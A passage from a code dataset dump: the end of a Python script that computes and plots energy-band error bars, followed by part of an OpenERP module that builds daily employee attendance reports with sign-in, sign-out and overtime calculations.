hieV2backenergy.append(temp[0][0])\n x = x + 1\nmaxV2foreenergy = []\nx = 0\nwhile x < len(rightmaxV2fore):\n temp = numpy.array(rightmaxV2fore[x])\n maxV2foreenergy.append(temp[0][0])\n x = x + 1\nmaxV2backenergy = []\nx = 0\nwhile x < len(rightmaxV2back):\n temp = numpy.array(rightmaxV2back[x])\n maxV2backenergy.append(temp[0][0])\n x = x + 1\nlowV3foreenergy = []\nx = 0\nwhile x < len(rightlowV3fore):\n temp = numpy.array(rightlowV3fore[x])\n lowV3foreenergy.append(temp[0][0])\n x = x + 1\nlowV3backenergy = []\nx = 0\nwhile x < len(rightlowV3back):\n temp = numpy.array(rightlowV3back[x])\n lowV3backenergy.append(temp[0][0])\n x = x + 1\nmidV3foreenergy = []\nx = 0\nwhile x < len(rightmidV3fore):\n temp = numpy.array(rightmidV3fore[x])\n midV3foreenergy.append(temp[0][0])\n x = x + 1\nmidV3backenergy = []\nx = 0\nwhile x < len(rightmidV3back):\n temp = numpy.array(rightmidV3back[x])\n midV3backenergy.append(temp[0][0])\n x = x + 1\nhieV3foreenergy = []\nx = 0\nwhile x < len(righthieV3fore):\n temp = numpy.array(righthieV3fore[x])\n hieV3foreenergy.append(temp[0][0])\n x = x + 1\nhieV3backenergy = []\nx = 0\nwhile x < len(righthieV3back):\n temp = numpy.array(righthieV3back[x])\n hieV3backenergy.append(temp[0][0])\n x = x + 1\nmaxV3foreenergy = []\nx = 0\nwhile x < len(rightmaxV3fore):\n temp = numpy.array(rightmaxV3fore[x])\n maxV3foreenergy.append(temp[0][0])\n x = x + 1\nmaxV3backenergy = []\nx = 0\nwhile x < len(rightmaxV3back):\n temp = numpy.array(rightmaxV3back[x])\n maxV3backenergy.append(temp[0][0])\n x = x + 1\nlowV4foreenergy = []\nx = 0\nwhile x < len(rightlowV4fore):\n temp = numpy.array(rightlowV4fore[x])\n lowV4foreenergy.append(temp[0][0])\n x = x + 1\nlowV4backenergy = []\nx = 0\nwhile x < len(rightlowV4back):\n temp = numpy.array(rightlowV4back[x])\n lowV4backenergy.append(temp[0][0])\n x = x + 1\nmidV4foreenergy = []\nx = 0\nwhile x < len(rightmidV4fore):\n temp = numpy.array(rightmidV4fore[x])\n midV4foreenergy.append(temp[0][0])\n x = x + 1\nmidV4backenergy = []\nx = 0\nwhile x < len(rightmidV4back):\n temp = numpy.array(rightmidV4back[x])\n midV4backenergy.append(temp[0][0])\n x = x + 1\nhieV4foreenergy = []\nx = 0\nwhile x < len(righthieV4fore):\n temp = numpy.array(righthieV4fore[x])\n hieV4foreenergy.append(temp[0][0])\n x = x + 1\nhieV4backenergy = []\nx = 0\nwhile x < len(righthieV4back):\n temp = numpy.array(righthieV4back[x])\n hieV4backenergy.append(temp[0][0])\n x = x + 1\nmaxV4foreenergy = []\nx = 0\nwhile x < len(rightmaxV4fore):\n temp = numpy.array(rightmaxV4fore[x])\n maxV4foreenergy.append(temp[0][0])\n x = x + 1\nmaxV4backenergy = []\nx = 0\nwhile x < len(rightmaxV4back):\n temp = numpy.array(rightmaxV4back[x])\n maxV4backenergy.append(temp[0][0])\n x = x + 1\n\nerrorlowV1fore = eventslowV1fore*(sum(lowV1foreenergy)/len(lowV1fore))**2/(lowband*lowexposure*pixV1fore)\nerrorlowV1back = eventslowV1back*(sum(lowV1backenergy)/len(lowV1back))**2/(lowband*lowexposure*pixV1back)\nerrormidV1fore = eventsmidV1fore*(sum(midV1foreenergy)/len(midV1fore))**2/(midband*midexposure*pixV1fore)\nerrormidV1back = eventsmidV1back*(sum(midV1backenergy)/len(midV1back))**2/(midband*midexposure*pixV1back)\nerrorhieV1fore = eventshieV1fore*(sum(hieV1foreenergy)/len(hieV1fore))**2/(hieband*hieexposure*pixV1fore)\nerrorhieV1back = eventshieV1back*(sum(hieV1backenergy)/len(hieV1back))**2/(hieband*hieexposure*pixV1back)\nerrormaxV1fore = eventsmaxV1fore*(sum(maxV1foreenergy)/len(maxV1fore))**2/(maxband*maxexposure*pixV1fore)\nerrormaxV1back = 
eventsmaxV1back*(sum(maxV1backenergy)/len(maxV1back))**2/(maxband*maxexposure*pixV1back)\nerrorlowV2fore = eventslowV2fore*(sum(lowV2foreenergy)/len(lowV2fore))**2/(lowband*lowexposure*pixV2fore)\nerrorlowV2back = eventslowV2back*(sum(lowV2backenergy)/len(lowV2back))**2/(lowband*lowexposure*pixV2back)\nerrormidV2fore = eventsmidV2fore*(sum(midV2foreenergy)/len(midV2fore))**2/(midband*midexposure*pixV2fore)\nerrormidV2back = eventsmidV2back*(sum(midV2backenergy)/len(midV2back))**2/(midband*midexposure*pixV2back)\nerrorhieV2fore = eventshieV2fore*(sum(hieV2foreenergy)/len(hieV2fore))**2/(hieband*hieexposure*pixV2fore)\nerrorhieV2back = eventshieV2back*(sum(hieV2backenergy)/len(hieV2back))**2/(hieband*hieexposure*pixV2back)\nerrormaxV2fore = eventsmaxV2fore*(sum(maxV2foreenergy)/len(maxV2fore))**2/(maxband*maxexposure*pixV2fore)\nerrormaxV2back = eventsmaxV2back*(sum(maxV2backenergy)/len(maxV2back))**2/(maxband*maxexposure*pixV2back)\nerrorlowV3fore = eventslowV3fore*(sum(lowV3foreenergy)/len(lowV3fore))**2/(lowband*lowexposure*pixV3fore)\nerrorlowV3back = eventslowV3back*(sum(lowV3backenergy)/len(lowV3back))**2/(lowband*lowexposure*pixV3back)\nerrormidV3fore = eventsmidV3fore*(sum(midV3foreenergy)/len(midV3fore))**2/(midband*midexposure*pixV3fore)\nerrormidV3back = eventsmidV3back*(sum(midV3backenergy)/len(midV3back))**2/(midband*midexposure*pixV3back)\nerrorhieV3fore = eventshieV3fore*(sum(hieV3foreenergy)/len(hieV3fore))**2/(hieband*hieexposure*pixV3fore)\nerrorhieV3back = eventshieV3back*(sum(hieV3backenergy)/len(hieV3back))**2/(hieband*hieexposure*pixV3back)\nerrormaxV3fore = eventsmaxV3fore*(sum(maxV3foreenergy)/len(maxV3fore))**2/(maxband*maxexposure*pixV3fore)\nerrormaxV3back = eventsmaxV3back*(sum(maxV3backenergy)/len(maxV3back))**2/(maxband*maxexposure*pixV3back)\nerrorlowV4fore = eventslowV4fore*(sum(lowV4foreenergy)/len(lowV4fore))**2/(lowband*lowexposure*pixV4fore)\nerrorlowV4back = eventslowV4back*(sum(lowV4backenergy)/len(lowV4back))**2/(lowband*lowexposure*pixV4back)\nerrormidV4fore = eventsmidV4fore*(sum(midV4foreenergy)/len(midV4fore))**2/(midband*midexposure*pixV4fore)\nerrormidV4back = eventsmidV4back*(sum(midV4backenergy)/len(midV4back))**2/(midband*midexposure*pixV4back)\nerrorhieV4fore = eventshieV4fore*(sum(hieV4foreenergy)/len(hieV4fore))**2/(hieband*hieexposure*pixV4fore)\nerrorhieV4back = eventshieV4back*(sum(hieV4backenergy)/len(hieV4back))**2/(hieband*hieexposure*pixV4back)\nerrormaxV4fore = eventsmaxV4fore*(sum(maxV4foreenergy)/len(maxV4fore))**2/(maxband*maxexposure*pixV4fore)\nerrormaxV4back = eventsmaxV4back*(sum(maxV4backenergy)/len(maxV4back))**2/(maxband*maxexposure*pixV4back)\n\n########calculated#########\n########calculated#########\n########calculated#########\n########calculated#########\n########calculated#########\n\nlowenergy = [1467.65,1467.65,1467.65,1467.65]\nmidenergy = [3161.32,3161.32,3161.32,3161.32]\nhieenergy = [6809.48,6809.48,6809.48,6809.48]\nmaxenergy = [14667.6,14667.6,14667.6,14667.6]\n\nenergyx = []\nx = 0\nwhile x < len(lowenergy):\n energyx.append(lowenergy[x])\n x = x + 1\nx = 0\nwhile x < len(midenergy):\n energyx.append(midenergy[x])\n x = x + 1\nx = 0\nwhile x < len(hieenergy):\n energyx.append(hieenergy[x])\n x = x + 1\nx = 0\nwhile x < len(maxenergy):\n energyx.append(maxenergy[x])\n x = x + 1\n\n#errory = [errorlowV1fore,errorlowV1back,errormidV1fore,errormidV1back,errorhieV1fore,errorhieV1back,errormaxV1fore,errormaxV1back,\n# 
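\n#A minimal helper sketch (an addition for illustration; the name flux_error and its signature\n#are assumptions, not part of the original script). Every error term above has the same shape,\n#N_events * <E>^2 / (band width * exposure * pixel count), which one function can capture:\ndef flux_error(n_events, energies, n_norm, band, exposure, n_pix):\n    #mean band energy (sum/n_norm, exactly as in the assignments above), squared,\n    #divided by band width, exposure and pixel count\n    return n_events * (sum(energies) / n_norm)**2 / (band * exposure * n_pix)\n#e.g. flux_error(eventslowV1fore, lowV1foreenergy, len(lowV1fore), lowband, lowexposure, pixV1fore)\n#reproduces errorlowV1fore above\n# 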
errorlowV2fore,errorlowV2back,errormidV2fore,errormidV2back,errorhieV2fore,errorhieV2back,errormaxV2fore,errormaxV2back,\n# errorlowV3fore,errorlowV3back,errormidV3fore,errormidV3back,errorhieV3fore,errorhieV3back,errormaxV3fore,errormaxV3back,\n# errorlowV4fore,errorlowV4back,errormidV4fore,errormidV4back,errorhieV4fore,errorhieV4back,errormaxV4fore,errormaxV4back]\nerrory = [errorlowV1fore-errorlowV1back,errormidV1fore-errormidV1back,errorhieV1fore-errorhieV1back,errormaxV1fore-errormaxV1back,\n errorlowV2fore-errorlowV2back,errormidV2fore-errormidV2back,errorhieV2fore-errorhieV2back,errormaxV2fore-errormaxV2back,\n errorlowV3fore-errorlowV3back,errormidV3fore-errormidV3back,errorhieV3fore-errorhieV3back,errormaxV3fore-errormaxV3back,\n errorlowV4fore-errorlowV4back,errormidV4fore-errormidV4back,errorhieV4fore-errorhieV4back,errormaxV4fore-errormaxV4back]\n\nfig = plt.figure()\nX = energyx\nY = errory\n\nplt.plot(X,Y,'.')\nplt.xscale('log')\nplt.show()","sub_path":"error bars v1 pt 3.py","file_name":"error bars v1 pt 3.py","file_ext":"py","file_size_in_byte":54687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"241909130","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see .\n#\n##############################################################################\n\nimport time\nfrom lxml import etree\nfrom dateutil import rrule\nfrom datetime import datetime, timedelta\nfrom openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT\nfrom openerp.tools.misc import DEFAULT_SERVER_DATE_FORMAT\nfrom openerp.addons.dm_base import utils\n\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nimport openerp.addons.decimal_precision as dp\n'''\nAttendance report by employee and day, working period\n'''\nclass hr_rpt_attend_emp_day(osv.osv):\n _name = \"hr.rpt.attend.emp.day\"\n _description = \"HR Attendance Employee Daily Report\"\n _columns = {\n 'name': fields.char('Report Name', size=32, required=False),\n 'title': fields.char('Report Title', required=False),\n 'type': fields.char('Report Type', size=16, required=True),\n 'company_id': fields.many2one('res.company','Company',required=True), \n \n #report data lines\n 'rpt_lines': fields.one2many('hr.rpt.attend.emp.day.line', 'rpt_id', string='Report Line'),\n 'date_from': fields.datetime(\"Start Date\", required=True),\n 'date_to': fields.datetime(\"End Date\", required=True),\n 'emp_ids': fields.many2many('hr.employee', string='Selected Employees'),\n \n 'state': fields.selection([\n ('draft', 'Draft'),\n ('confirmed', 'Confirmed'),\n ('cancel', 'Cancel'),\n ], 'Status', select=True, readonly=True, track_visibility='onchange'), \n \n 'note': fields.text('Description', readonly=False, states={'done':[('readonly',True)]}),\n 'attend_month_ids': fields.one2many('hr.rpt.attend.month', 'attend_day_id', string='Attendances Monthly', readonly=True),\n }\n\n _defaults = {\n 'type': 'attend_emp_day', \n 'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.rptcn', context=c),\n 'state': 'draft', \n }\n \n def copy(self, cr, uid, id, default=None, context=None):\n if not default:\n default = {}\n default['attend_month_ids'] = None\n default['rpt_lines'] = None\n return super(hr_rpt_attend_emp_day, self).copy(cr, uid, id, default, context)\n \n def default_get(self, cr, uid, fields, context=None):\n vals = super(hr_rpt_attend_emp_day, self).default_get(cr, uid, fields, context=context)\n if 'date_from' in fields:\n #For the datetime value in defaults, need convert the local time to UTC, the web framework will convert them back to local time on GUI\n date_from =datetime.strptime(time.strftime('%Y-%m-01 00:00:00'), '%Y-%m-%d %H:%M:%S')\n date_from_utc = utils.utc_timestamp(cr, uid, date_from, context)\n vals.update({'date_from':date_from_utc.strftime(DEFAULT_SERVER_DATETIME_FORMAT)})\n \n if 'date_to' in fields:\n date_to = datetime.strptime(time.strftime('%Y-%m-%d 23:59:59'), '%Y-%m-%d %H:%M:%S') \n date_to_utc = utils.utc_timestamp(cr, uid, date_to, context) \n vals.update({'date_to':date_to_utc.strftime(DEFAULT_SERVER_DATETIME_FORMAT)})\n \n return vals\n \n def _check_dates(self, cr, uid, ids, context=None):\n for wiz in self.browse(cr, uid, ids, context=context):\n if wiz.date_from and wiz.date_to and wiz.date_from > wiz.date_to:\n return False\n return True\n\n _constraints = [\n (_check_dates, 'The date end must be after the date start.', ['date_from','date_to']),\n ]\n \n def get_report_name(self, cr, uid, id, rpt_name, context=None):\n return \"Attendance Employee Daily Report\"\n \n def name_get(self, cr, uid, ids, context=None):\n if not ids:\n return []\n if isinstance(ids,(int,long)):\n ids = [ids]\n res = []\n for row in 
self.read(cr, uid, ids, ['name'], context=context):\n            res.append((row['id'],'[%s]%s'%(row['id'],row['name'])))\n        return res\n\n    def _convert_save_dates(self, cr, uid, vals, context):\n        #convert a date string like '2013-01-01' to a UTC datetime before storing\n        if 'date_from' in vals and len(vals['date_from']) == 10:\n            date_from = vals['date_from']\n            date_from = utils.utc_timestamp(cr, uid, datetime.strptime(date_from + ' 00:00:00', DEFAULT_SERVER_DATETIME_FORMAT),context=context)\n            date_from = date_from.strftime(DEFAULT_SERVER_DATETIME_FORMAT)\n            vals['date_from'] = date_from\n        if 'date_to' in vals and len(vals['date_to']) == 10:\n            date_to = vals['date_to']\n            date_to = utils.utc_timestamp(cr, uid, datetime.strptime(date_to + ' 23:59:59', DEFAULT_SERVER_DATETIME_FORMAT),context=context)\n            date_to = date_to.strftime(DEFAULT_SERVER_DATETIME_FORMAT)\n            vals['date_to'] = date_to\n\n    def create(self, cr, uid, vals, context=None):\n        if 'name' not in vals or not vals['name']:\n            date_to = vals['date_to']\n            if date_to and len(date_to) == 10:\n                date_to = vals['date_to'] + ' 00:00:00'\n            date_to = datetime.strptime(date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n            name = '%s-%s'%(date_to.year, date_to.month)\n            vals['name'] = name\n        self._convert_save_dates(cr, uid, vals, context)\n        id_new = super(hr_rpt_attend_emp_day, self).create(cr, uid, vals, context=context)\n        return id_new\n\n    def write(self, cr, uid, ids, vals, context=None):\n        if isinstance(ids, (int, long)):\n            ids = [ids]\n        self._convert_save_dates(cr, uid, vals, context)\n        old_emp_ids = []\n        if 'emp_ids' in vals:\n            old_emp_ids = self.read(cr, uid, ids[0], ['emp_ids'],context=context)['emp_ids']\n        resu = super(hr_rpt_attend_emp_day, self).write(cr, uid, ids, vals, context=context)\n        new_emp_ids = self.read(cr, uid, ids[0], ['emp_ids'],context=context)['emp_ids']\n        if old_emp_ids:\n            del_emp_ids = []\n            if new_emp_ids:\n                for emp_id in old_emp_ids:\n                    if emp_id not in new_emp_ids:\n                        del_emp_ids.append(emp_id)\n            else:\n                del_emp_ids = old_emp_ids\n            #unlink the report lines of employees removed from the selection\n            if del_emp_ids:\n                rpt_line_obj = self.pool.get('hr.rpt.attend.emp.day.line')\n                unlink_line_ids = rpt_line_obj.search(cr, uid, [('rpt_id','=',ids[0]),('emp_id','in',del_emp_ids)])\n                rpt_line_obj.unlink(cr, uid, unlink_line_ids, context=context)\n        return resu\n\n    def unlink(self, cr, uid, ids, context=None):\n        for rpt in self.read(cr, uid, ids, ['state'], context=context):\n            if rpt['state'] not in ('draft','cancel'):\n                raise osv.except_osv(_('Error'),_('Only reports in Draft/Cancel state can be deleted!'))\n        return super(hr_rpt_attend_emp_day, self).unlink(cr, uid, ids, context=context)\n\n    def action_confirm(self, cr, uid, ids, context=None):\n        self.write(cr, uid, ids, {'state':'confirmed'})\n        return True\n\n    def action_cancel_draft(self, cr, uid, ids, context=None):\n        self.write(cr, uid, ids, {'state':'draft'})\n        return True\n\n    def action_cancel(self, cr, uid, ids, context=None):\n        for rpt in self.browse(cr, uid, ids, context=context):\n            if rpt.attend_month_ids:\n                for attend_month in rpt.attend_month_ids:\n                    if attend_month.state != 'cancel':\n                        raise osv.except_osv(_('Error!'),_('There are related monthly attendance reports, please cancel or delete them first!'))\n        self.write(cr, uid, ids, {'state':'cancel'})\n        return True\n\n    #generate a new monthly report\n    def new_attend_month(self, cr, uid, ids, context=None):\n        rpt_id = ids[0]\n        #read the daily report data and create a new monthly report based on it\n        rpt = self.browse(cr, uid, rpt_id, context=context)\n        rpt_month_obj = 
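self.pool.get('hr.rpt.attend.month')\n        #added note: in the command list used for emp_ids below, (4, id) is the standard\n        #one2many/many2many command that links an existing record, so the employees\n        #selected on this daily report are attached to the new monthly report\n        _ = 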
self.pool.get('hr.rpt.attend.month') \n vals = {'date_from':rpt.date_from, \n 'date_to':rpt.date_to, \n 'emp_ids':[(4,emp.id) for emp in rpt.emp_ids],\n 'company_id':rpt.company_id.id,\n 'attend_day_id':rpt.id}\n rpt_month_id = rpt_month_obj.create(cr, uid, vals, context=context)\n #generate report\n rpt_month_obj.run_report(cr, uid, [rpt_month_id], context=context)\n #go to the attendances monthly report view page\n form_view = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'dmp_hr_attend', 'hr_rpt_attend_month_view')\n form_view_id = form_view and form_view[1] or False\n return {\n 'name': _('Attendances Monthly Report'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'view_id': [form_view_id],\n 'res_model': 'hr.rpt.attend.month',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'res_id': rpt_month_id,\n }\n\n #view monthly report\n def view_attend_month(self, cr, uid, ids, context=None):\n rpt_id = ids[0]\n #read daily report data, create new monthly report based on it.\n rpt = self.read(cr, uid, rpt_id, ['attend_month_ids'], context=context)\n rpt_month_ids = rpt['attend_month_ids']\n if not rpt_month_ids:\n raise osv.except_osv(_('Error!'),_('No monthly attendance report generated!'))\n if len(rpt_month_ids) > 1:\n #got to list page\n act_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'dmp_hr_attend', 'hr_rpt_attend_month_action')\n act_id = act_id and act_id[1] or False \n act_win = self.pool.get('ir.actions.act_window').read(cr, uid, act_id, [], context=context)\n act_win['context'] = {'search_default_attend_day_id': rpt['id']}\n return act_win\n else:\n #go to form page\n form_view = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'dmp_hr_attend', 'hr_rpt_attend_month_view')\n form_view_id = form_view and form_view[1] or False\n return {\n 'name': _('Attendances Monthly Report'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'view_id': [form_view_id],\n 'res_model': 'hr.rpt.attend.month',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'res_id': rpt_month_ids[0],\n }\n \n def _attend_hours(self, hours_valid, period):\n \n if hours_valid+0.5 >= period.hours_work_normal:\n hours_normal = period.hours_work_normal\n else: \n hours_normal = hours_valid\n \n hours_ot = hours_valid - hours_normal\n if hours_ot+0.5 >= period.hours_work_ot:\n hours_ot = period.hours_work_ot\n \n #the second time group \n if hours_valid+0.5 >= period.hours_work_normal2:\n hours_normal2 = period.hours_work_normal2\n else:\n hours_normal2 = hours_valid\n \n hours_ot2 = hours_valid - hours_normal2\n if hours_ot2+0.5 >= period.hours_work_ot2:\n hours_ot2 = period.hours_work_ot2\n \n return hours_normal, hours_ot, hours_normal2, hours_ot2\n \n\n def run_report(self, cr, uid, ids, context=None, emp_ids=None):\n rpt = self.browse(cr, uid, ids, context=context)[0]\n if not rpt.emp_ids:\n raise osv.except_osv(_('Warning!'),_('Please select employees to get attendance!'))\n rpt_method = getattr(self, 'run_%s'%(rpt.type,))\n #get report data\n rpt_line_obj, rpt_lns = rpt_method(cr, uid, ids, context, emp_ids=emp_ids)\n #remove the old lines\n unlink_domain = [('rpt_id','=',rpt.id)]\n if emp_ids:\n unlink_domain.append(('emp_id','in',emp_ids))\n unlink_ids = rpt_line_obj.search(cr, uid, unlink_domain, context=context)\n rpt_line_obj.unlink(cr ,uid, unlink_ids, context=context)\n #create new lines\n for rpt_line in rpt_lns:\n rpt_line['rpt_id'] = rpt.id\n rpt_line_obj.create(cr ,uid, rpt_line, context=context) \n #update GUI elements\n 
self.write(cr, uid, rpt.id, {'show_search':False,'show_result':True,'save_pdf':True},context=context)\n #go to the attendances line view page\n form_view = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'dmp_hr_attend', 'view_hr_rpt_attend_emp_day_line_tree')\n form_view_id = form_view and form_view[1] or False\n return {\n 'name': _('Attendances Daily Report Line'),\n 'view_type': 'form',\n 'view_mode': 'tree',\n 'view_id': [form_view_id],\n 'res_model': 'hr.rpt.attend.emp.day.line',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'domain': [('rpt_id','=',ids[0])],\n# 'context': {'search_default_groupby_emp':True},\n }\n \n return True\n \n def run_attend_emp_day(self, cr, uid, ids, context=None, emp_ids=None):\n '''\n 1.Query all data with both in/out by date range, store the result in attends_normal\n 2.Loop on by days and employees\n '''\n emp_obj = self.pool.get('hr.employee')\n attend_obj = self.pool.get('hr.attendance')\n \n if context is None: context = {} \n rpt = self.browse(cr, uid, ids, context=context)[0]\n date_from = datetime.strptime(rpt.date_from,DEFAULT_SERVER_DATETIME_FORMAT)\n date_to = datetime.strptime(rpt.date_to,DEFAULT_SERVER_DATETIME_FORMAT)\n #report data line\n rpt_lns = []\n #context for the query\n c = context.copy()\n #get the employees\n if not emp_ids:\n emp_ids = [emp.id for emp in rpt.emp_ids]\n if not emp_ids:\n emp_ids = emp_obj.search(cr, uid, [], context=context)\n #sort the employee ids\n emp_ids.sort()\n \n '''\n 1.Query all data with both in/out by date range, store the result in attends_normal\n '''\n sql = '''\n select emp.id as emp_id, \n period.id as period_id, \n sign_in.day,\n sign_in.action as in_action, sign_in.name as in_time, sign_out.action out_action, sign_out.name out_time\n from hr_employee emp\n left join \n (select name,employee_id,cale_period_id,action,day from hr_attendance where name between %s and %s and action in('sign_in','sign_in_late')) as sign_in\n on emp.id = sign_in.employee_id\n left join \n (select name,employee_id,cale_period_id,action,day from hr_attendance where name between %s and %s and action in('sign_out','sign_out_early')) as sign_out\n on emp.id = sign_out.employee_id and sign_in.day = sign_out.day and sign_in.cale_period_id = sign_out.cale_period_id\n join resource_calendar_attendance period on sign_in.cale_period_id = period.id and sign_out.cale_period_id = period.id\n where emp.id = ANY(%s)\n '''\n cr.execute(sql,(date_from, date_to, date_from, date_to, (emp_ids,)))\n attends = cr.dictfetchall()\n #use the emp_id-day-period_id as the key to store the normal attendance\n# attends_normal = dict(('%s-%s-%s'%(attend['emp_id'], attend['day'], attend['period_id']), attend) for attend in attends)\n attends_normal = {}\n for attend in attends:\n key = '%s-%s-%s'%(attend['emp_id'], attend['day'], attend['period_id'])\n in_time = fields.datetime.context_timestamp(cr, uid, datetime.strptime(attend['in_time'],DEFAULT_SERVER_DATETIME_FORMAT), context=context)\n out_time = fields.datetime.context_timestamp(cr, uid, datetime.strptime(attend['out_time'],DEFAULT_SERVER_DATETIME_FORMAT), context=context)\n attend['in_time'] = in_time\n attend['out_time'] = out_time\n attends_normal[key] = attend\n \n '''\n 2.Loop on by days and employees\n '''\n date_from_local = fields.datetime.context_timestamp(cr, uid, date_from, context)\n date_to_local = fields.datetime.context_timestamp(cr, uid, date_to, context)\n days = rrule.rrule(rrule.DAILY, dtstart=date_from_local,until=date_to_local)\n emps = 
emp_obj.browse(cr, uid, emp_ids, context)\n        seq = 0\n        for emp in emps:\n            for day_dt in days:\n                emp_cale = emp_obj.get_wt(cr, uid, emp.id, day_dt, context=context)\n                day = day_dt.strftime('%Y-%m-%d')\n                #if the employee has no working time defined for this day, add an empty line and skip to the next day\n                if not emp_cale or not emp_cale.attendance_ids:\n                    seq += 1\n                    '''\n                    init a new empty line by employee/day without period info\n                    '''\n                    rpt_line = {'seq': seq,\n                                'emp_id': emp.id,\n                                'day': day_dt,\n                                'period_id': None,\n                                'sign_in':None,\n                                'sign_out':None,\n                                'hours_normal':None,\n                                'hours_ot':None,\n                                'is_late':False,\n                                'is_early':False,\n                                'is_absent':False,\n                                'hours_normal2':None,\n                                'hours_ot2':None,}\n                    rpt_lns.append(rpt_line)\n                    continue\n                for period in emp_cale.attendance_ids:\n                    if day_dt.isoweekday() != (int(period.dayofweek) + 1):\n                        continue\n                    '''\n                    init a new empty line by employee/day/period\n                    '''\n                    seq += 1\n                    rpt_line = {'seq': seq,\n                                'emp_id': emp.id,\n                                'day': day_dt,\n                                'period_id': period.id,\n                                'sign_in':None,\n                                'sign_out':None,\n                                'hours_normal':None,\n                                'hours_ot':None,\n                                'is_late':False,\n                                'is_early':False,\n                                'is_absent':False,\n                                'hours_normal2':None,\n                                'hours_ot2':None,}\n                    rpt_lns.append(rpt_line)\n                    #find the normal attendance by employee/day/period\n                    attend_key = '%s-%s-%s'%(emp.id, day, period.id)\n                    attend = attends_normal.get(attend_key, False)\n                    if attend:\n                        #found a normal attendance with both sign in and sign out records, fill in the data directly\n                        hour_in = attend['in_time'].hour + attend['in_time'].minute/60.0\n                        hour_out = attend['out_time'].hour + attend['out_time'].minute/60.0\n                        hours_valid = hour_out - hour_in - period.hours_non_work\n                        attend_hours = self._attend_hours(hours_valid, period)\n                        rpt_line.update({'period_id':period.id,\n                                         'sign_in':hour_in,\n                                         'sign_out':hour_out,\n                                         'hours_normal':attend_hours[0],\n                                         'hours_ot':attend_hours[1],\n                                         'is_late':attend['in_action']=='sign_in_late',\n                                         'is_early':attend['out_action']=='sign_out_early',\n                                         'hours_normal2':attend_hours[2],\n                                         'hours_ot2':attend_hours[3],\n                                         })\n                        continue\n                    #abnormal attendance: only a sign in or a sign out record, or no attendance at all\n                    attend_ids = attend_obj.search(cr, uid, [('employee_id','=',emp.id),('day','=',day),('cale_period_id','=',period.id),\n                                                             ('action','in',('sign_in','sign_in_late','sign_out','sign_out_early'))], context=context)\n                    if attend_ids:\n                        #found a sign in or sign out record; there should be only one, so use the first ID to get the data\n                        attend = attend_obj.browse(cr, uid, attend_ids[0], context=context)\n                        attend_time = fields.datetime.context_timestamp(cr, uid, datetime.strptime(attend.name,DEFAULT_SERVER_DATETIME_FORMAT), context)\n                        hour_in = None\n                        hour_out = None\n                        hours_valid = None\n                        hours_normal = None\n                        hours_ot = None\n                        is_late = False\n                        is_early = False\n                        is_absent = False\n                        hours_normal2 = None\n                        hours_ot2 = None\n                        #only a sign in record exists\n                        if attend.action in ('sign_in','sign_in_late'):\n                            hour_in = attend_time.hour + attend_time.minute/60.0\n                            if emp_cale.no_out_option == 'early':\n                                #treat the missing sign out as leaving early\n                                if not period.is_full_ot:\n                                    is_early = True\n                                hours_valid = period.hour_to - hour_in - period.hours_non_work - emp_cale.no_out_time/60.0\n                            else:\n                                #treat as absent\n                                if not period.is_full_ot:\n                                    is_absent = True\n                                hours_valid = 0.0\n                        #only a sign out record exists\n                        if attend.action in ('sign_out','sign_out_early'):\n                            hour_out = attend_time.hour + attend_time.minute/60.0\n                            if emp_cale.no_in_option == 'late':\n                                #treat the missing sign in as arriving late\n                                if not period.is_full_ot:\n                                    is_late = True\n                                hours_valid 
= hour_out - period.hour_from - period.hours_non_work - emp_cale.no_in_time/60.0\n else:\n #treat as absent\n if not period.is_full_ot:\n is_absent = True\n hours_valid = 0.0\n if hours_valid:\n hours_normal, hours_ot, hours_normal2, hours_ot2 = self._attend_hours(hours_valid, period)\n \n rpt_line.update({'period_id':period.id, \n 'sign_in':hour_in,\n 'sign_out':hour_out,\n 'hours_normal':hours_normal,\n 'hours_ot':hours_ot,\n 'is_late':is_late,\n 'is_early':is_early,\n 'is_absent':is_absent,\n 'hours_normal2':hours_normal2,\n 'hours_ot2':hours_ot2,\n })\n else:\n if not period.is_full_ot:\n rpt_line.update({'is_absent':True})\n '''========return data to rpt_base.run_report()=========''' \n return self.pool.get('hr.rpt.attend.emp.day.line'), rpt_lns\n \n def _pdf_data(self, cr, uid, ids, form_data, context=None):\n return {'xmlrpt_name': 'hr.rpt.attend.emp.day'}\n \n def save_pdf(self, cr, uid, ids, context=None):\n if context is None: \n context = {}\n form_data = self.read(cr, uid, ids[0], context=context)\n rptxml_name = self._pdf_data(cr, uid, ids[0], form_data, context=context)['xmlrpt_name']\n datas = {\n 'model': self._name,\n 'ids': [ids[0]],\n 'form': form_data,\n }\n return {'type': 'ir.actions.report.xml', 'report_name': rptxml_name, 'datas': datas, 'nodestroy': True} \n \n def print_empday_group(self, cr, uid, ids, context=None, rpt_line_ids = None):\n if context is None:\n context = {}\n '''\n store the groups in dict: {key:{\n val1,val2,...,\n #lines:{key:line_data}\n {}\n valn\n }\n }\n '''\n groups = {}\n #store the calendar worktime types in dict:{calendar_id:type_list}\n cale_wt_types = {}\n \n #get the group data \n rptlines = []\n if not rpt_line_ids: \n #call from self\n rpt = self.browse(cr, uid, ids[0], context=context)\n rptlines = rpt.rpt_lines\n else:\n #this parameter will be called from hr_rpt_attend_emp_day_line.print_empday_line_group()\n rptlines = 